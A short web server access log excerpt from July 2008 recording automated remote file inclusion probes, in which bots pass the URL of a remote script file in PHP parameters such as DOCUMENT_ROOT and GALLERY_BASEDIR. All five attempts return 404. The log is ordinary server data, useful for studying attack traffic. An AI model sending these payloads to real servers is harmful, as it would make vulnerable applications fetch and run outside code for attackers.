195.93.201.102 - - [31/Jul/2008:02:41:37 -0500] "GET //index.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.67.26.157 - - [31/Jul/2008:02:41:49 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:02:41:49 -0500] "GET //index.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
89.111.173.117 - - [31/Jul/2008:02:41:52 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:02:41:52 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
